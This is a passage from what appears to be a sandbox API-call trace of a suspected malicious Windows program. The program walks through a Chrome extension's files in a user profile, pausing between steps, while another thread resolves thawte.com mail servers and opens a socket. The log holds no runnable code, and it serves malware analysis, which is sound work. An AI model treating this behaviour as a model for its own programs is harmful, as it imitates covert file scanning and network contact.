SUCCESS | 0x0016be80 | |
| 07:44:28,515 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001c0 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x90\xec\xban\xe0\x91\xcf\x01\xa0\xbb\xcbn\xe0\x91\xcf\x01\xc0s\xbcn\xe0\x91\xcf\x01\xc0s\xbcn\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00_\x00T\x00W\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc0s\xbcn\xe0\x91\xcf\x01\xecn\xbbn\xe0\x91\xcf\x01\x00\xfb)\x91\x0c\xe0\xce\x01\xc0s\xbcn\xe0\x91\xcf\x01*\x03\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00 \x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00\x18\x00C\x00R\x00A\x00W\x00_\x00W\x00~\x001\x00.\x00H\x00T\x00M\x00c\x00r\x00a\x00w\x00_\x00w\x00i\x00n\x00d\x00o\x00w\x00.\x00h\x00t\x00m\x00l\x00 |
SUCCESS | 0x00000000 | |
| 07:44:28,515 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.0.6.1_0\html\craw_window.html DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001cc |
SUCCESS | 0x00000000 | |
| 07:44:28,515 | 504 | NtReadFile |
Buffer => <!DOCTYPE html>
<html>
<head>
<link href="/css/craw_window.css" rel="stylesheet">
<script src="/craw_window.js"></script>
</head>
<body>
<webview></webview>
<div class="craw_overlay" id="loading_overlay">
<img src="/images/icon_ FileHandle => 0x000001cc |
SUCCESS | 0x00000000 | |
| 07:44:28,515 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001cc |
FAILURE | 3221225489 | |
| 07:44:28,515 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001c0 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:28,515 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:28,606 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.0.6.1_0\images\*.* |
SUCCESS | 0x0016be80 | |
| 07:44:28,606 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001c0 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xc0s\xbcn\xe0\x91\xcf\x01\xf0\xe0\xeen\xe0\x91\xcf\x01\xf0m\xd6n\xe0\x91\xcf\x01\xf0m\xd6n\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00_\x00T\x00W\x00x\x00\x00\x00\x00\x00\x00\x00\xc0s\xbcn\xe0\x91\xcf\x01\\x80\xbcn\xe0\x91\xcf\x01\x00\xfb)\x91\x0c\xe0\xce\x01\xc0s\xbcn\xe0\x91\xcf\x01\xdc\x12\x01\x00\x00\x00\x00\x00\x00 \x01\x00\x00\x00\x00\x00 \x00\x00\x00\x16\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00f\x00l\x00a\x00p\x00p\x00e\x00r\x00.\x00g\x00i\x00f\x00.\x00h\x00x\x00\x00\x00\x00\x00\x00\x00\xf0\xfa\xbdn\xe0\x91\xcf\x01\xf0m\xd6n\xe0\x91\xcf\x01\xf0m\xd6n\xe0\x91\xcf\x01 |
SUCCESS | 0x00000000 | |
| 07:44:28,606 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001c0 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:28,606 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:28,696 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.0.6.1_0\_locales\*.* |
SUCCESS | 0x0016be80 | |
| 07:44:28,696 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001c0 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x90\x06\x8an\xe0\x91\xcf\x01\x00W\xb6n\xe0\x91\xcf\x01\x00W\xb6n\xe0\x91\xcf\x01\x00W\xb6n\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00_\x00T\x00W\x00h\x00\x00\x00\x00\x00\x00\x00\x90\x06\x8an\xe0\x91\xcf\x01\xa0\xbb\xcbn\xe0\x91\xcf\x01\x90\x06\x8an\xe0\x91\xcf\x01\x90\x06\x8an\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00b\x00g\x00a\x00p\x00p\x00h\x00\x00\x00\x00\x00\x00\x00\xc0\x8d\x8bn\xe0\x91\xcf\x01\xa0\xbb\xcbn\xe0\x91\xcf\x01\xf0\x14\x8dn\xe0\x91\xcf\x01\xf0\x14\x8dn\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 07:44:28,696 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:28,766 | 364 | gethostbyname |
Name => mx.thawte.com |
FAILURE | 0x00000000 | |
| 07:44:28,776 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.0.6.1_0\_locales\bg\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:28,776 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x90\x06\x8an\xe0\x91\xcf\x01\xa0\xbb\xcbn\xe0\x91\xcf\x01\x90\x06\x8an\xe0\x91\xcf\x01\x90\x06\x8an\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00aw_win\x00\x00\x00\x00\x00\x00\x00\x00\x90\x06\x8an\xe0\x91\xcf\x01\xf0m\xd6n\xe0\x91\xcf\x01\xf0m\xd6n\xe0\x91\xcf\x01\xf0m\xd6n\xe0\x91\xcf\x01A\x03\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:28,776 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:28,776 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:28,856 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.0.6.1_0\_locales\ca\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:28,856 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xc0\x8d\x8bn\xe0\x91\xcf\x01\xa0\xbb\xcbn\xe0\x91\xcf\x01\xf0\x14\x8dn\xe0\x91\xcf\x01\xf0\x14\x8dn\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00aw_win\x00\x00\x00\x00\x00\x00\x00\x00\xf0\x14\x8dn\xe0\x91\xcf\x01\xf0m\xd6n\xe0\x91\xcf\x01\xf0m\xd6n\xe0\x91\xcf\x01\xf0m\xd6n\xe0\x91\xcf\x01\x92\x02\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:28,856 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:28,856 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:28,886 | 364 | gethostbyname |
Name => mail.thawte.com |
SUCCESS | 0x001641e0 | |
| 07:44:28,886 | 364 | socket |
type => 1 protocol => 6 af => 2 |
SUCCESS | 0x000001cc | |
| 07:44:28,906 | 1308 | LdrGetDllHandle |
ModuleHandle => 0x771b0000 FileName => wininet.dll |
SUCCESS | 0x00000000 | |
| 07:44:28,906 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => InternetGetConnectedState FunctionAddress => 0x771d5c4e ModuleHandle => 0x771b0000 |
SUCCESS | 0x00000000 | |
| 07:44:28,906 | 1308 | OpenSCManagerW |
MachineName => DatabaseName => DesiredAccess => 2147483648 |
SUCCESS | 0x00172d00 | |
| 07:44:28,906 | 1308 | OpenServiceW |
ServiceControlManager => 0x00172d00 ServiceName => RASMAN DesiredAccess => 4 |
SUCCESS | 0x00182d20 | |
| 07:44:28,906 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => EnableAutodial Type => 184 |
FAILURE | 0x00000002 | |
| 07:44:28,906 | 1308 | NtQueryInformationFile |
FileHandle => 0x000000c0 FileInformation => \x00\xc0\x03\x00\x00\x00\x00\x00\x00\xc0\x03\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | 1 time |
| 07:44:28,906 | 1308 | NtDelayExecution |
Milliseconds => 800 |
SUCCESS | 0x00000000 | |
| 07:44:28,936 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.0.6.1_0\_locales\cs\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:28,936 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d4 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xf0\x14\x8dn\xe0\x91\xcf\x01\xa0\xbb\xcbn\xe0\x91\xcf\x01 \x9c\x8en\xe0\x91\xcf\x01 \x9c\x8en\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00aw_win\x00\x00\x00\x00\x00\x00\x00\x00 \x9c\x8en\xe0\x91\xcf\x01\xf0m\xd6n\xe0\x91\xcf\x01\xf0m\xd6n\xe0\x91\xcf\x01\xf0m\xd6n\xe0\x91\xcf\x01\x8b\x02\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:28,936 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d4 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:28,936 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:29,016 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.0.6.1_0\_locales\da\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:29,016 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d4 FileInformation => h\x00\x00\x00\x00\x00\x00\x00 \x9c\x8en\xe0\x91\xcf\x01\xa0\xbb\xcbn\xe0\x91\xcf\x01 \x9c\x8en\xe0\x91\xcf\x01 \x9c\x8en\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00aw_win\x00\x00\x00\x00\x00\x00\x00\x00 \x9c\x8en\xe0\x91\xcf\x01\xf0m\xd6n\xe0\x91\xcf\x01\xf0m\xd6n\xe0\x91\xcf\x01\xf0m\xd6n\xe0\x91\xcf\x01y\x02\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:29,016 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d4 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:29,016 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:29,096 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.0.6.1_0\_locales\de\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:29,096 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d4 FileInformation => h\x00\x00\x00\x00\x00\x00\x00P#\x90n\xe0\x91\xcf\x01\xa0\xbb\xcbn\xe0\x91\xcf\x01P#\x90n\xe0\x91\xcf\x01P#\x90n\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00aw_win\x00\x00\x00\x00\x00\x00\x00\x00P#\x90n\xe0\x91\xcf\x01\xf0m\xd6n\xe0\x91\xcf\x01\xf0m\xd6n\xe0\x91\xcf\x01\xf0m\xd6n\xe0\x91\xcf\x01\xba\x02\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:29,096 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d4 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:29,096 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:29,176 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.0.6.1_0\_locales\el\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:29,176 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d4 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x80\xaa\x91n\xe0\x91\xcf\x01\xa0\xbb\xcbn\xe0\x91\xcf\x01\x80\xaa\x91n\xe0\x91\xcf\x01\x80\xaa\x91n\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00aw_win\x00\x00\x00\x00\x00\x00\x00\x00\x80\xaa\x91n\xe0\x91\xcf\x01\xf0m\xd6n\xe0\x91\xcf\x01\xf0m\xd6n\xe0\x91\xcf\x01\xf0m\xd6n\xe0\x91\xcf\x01t\x03\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:29,176 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d4 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:29,176 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:29,257 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.0.6.1_0\_locales\en\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:29,257 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d4 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x80\xaa\x91n\xe0\x91\xcf\x01\xa0\xbb\xcbn\xe0\x91\xcf\x01\xb01\x93n\xe0\x91\xcf\x01\xb01\x93n\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00aw_win\x00\x00\x00\x00\x00\x00\x00\x00\xb01\x93n\xe0\x91\xcf\x01\xf0m\xd6n\xe0\x91\xcf\x01\xf0m\xd6n\xe0\x91\xcf\x01\xf0m\xd6n\xe0\x91\xcf\x01c\x02\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:29,257 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d4 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:29,257 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:29,337 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.0.6.1_0\_locales\en_GB\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:29,337 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d4 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xb01\x93n\xe0\x91\xcf\x01\xa0\xbb\xcbn\xe0\x91\xcf\x01\xe0\xb8\x94n\xe0\x91\xcf\x01\xe0\xb8\x94n\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00aw_win\x00\x00\x00\x00\x00\x00\x00\x00\xe0\xb8\x94n\xe0\x91\xcf\x01\xf0m\xd6n\xe0\x91\xcf\x01\xf0m\xd6n\xe0\x91\xcf\x01\xf0m\xd6n\xe0\x91\xcf\x01c\x02\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:29,337 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d4 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:29,337 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:29,567 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.0.6.1_0\_locales\es\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:29,577 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d4 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xe0\xb8\x94n\xe0\x91\xcf\x01\xa0\xbb\xcbn\xe0\x91\xcf\x01\x10@\x96n\xe0\x91\xcf\x01\x10@\x96n\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00aw_win\x00\x00\x00\x00\x00\x00\x00\x00\x10@\x96n\xe0\x91\xcf\x01\xf0m\xd6n\xe0\x91\xcf\x01\xf0m\xd6n\xe0\x91\xcf\x01\xf0m\xd6n\xe0\x91\xcf\x01\xad\x02\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:29,577 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d4 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:29,577 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:29,657 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.0.6.1_0\_locales\es_419\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:29,657 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d4 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x10@\x96n\xe0\x91\xcf\x01\xa0\xbb\xcbn\xe0\x91\xcf\x01@\xc7\x97n\xe0\x91\xcf\x01@\xc7\x97n\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00aw_win\x00\x00\x00\x00\x00\x00\x00\x00@\xc7\x97n\xe0\x91\xcf\x01 \xf5\xd7n\xe0\x91\xcf\x01 \xf5\xd7n\xe0\x91\xcf\x01 \xf5\xd7n\xe0\x91\xcf\x01\x87\x02\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:29,657 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d4 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:29,657 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:29,707 | 1308 | LdrGetDllHandle |
ModuleHandle => 0x771b0000 FileName => wininet.dll |
SUCCESS | 0x00000000 | |
| 07:44:29,707 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => InternetGetConnectedState FunctionAddress => 0x771d5c4e ModuleHandle => 0x771b0000 |
SUCCESS | 0x00000000 | |
| 07:44:29,707 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => EnableAutodial Type => 184 |
FAILURE | 0x00000002 | |
| 07:44:29,707 | 1308 | NtQueryInformationFile |
FileHandle => 0x000000c0 FileInformation => \x00\xc0\x03\x00\x00\x00\x00\x00\x00\xc0\x03\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | 1 time |
| 07:44:29,707 | 1308 | NtDelayExecution |
Milliseconds => 800 |
SUCCESS | 0x00000000 | |
| 07:44:29,737 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.0.6.1_0\_locales\et\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:29,737 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d4 FileInformation => h\x00\x00\x00\x00\x00\x00\x00@\xc7\x97n\xe0\x91\xcf\x01\xa0\xbb\xcbn\xe0\x91\xcf\x01@\xc7\x97n\xe0\x91\xcf\x01@\xc7\x97n\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00aw_win\x00\x00\x00\x00\x00\x00\x00\x00@\xc7\x97n\xe0\x91\xcf\x01 \xf5\xd7n\xe0\x91\xcf\x01 \xf5\xd7n\xe0\x91\xcf\x01 \xf5\xd7n\xe0\x91\xcf\x01[\x02\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:29,737 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d4 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:29,737 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:29,817 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.0.6.1_0\_locales\fi\*.* |
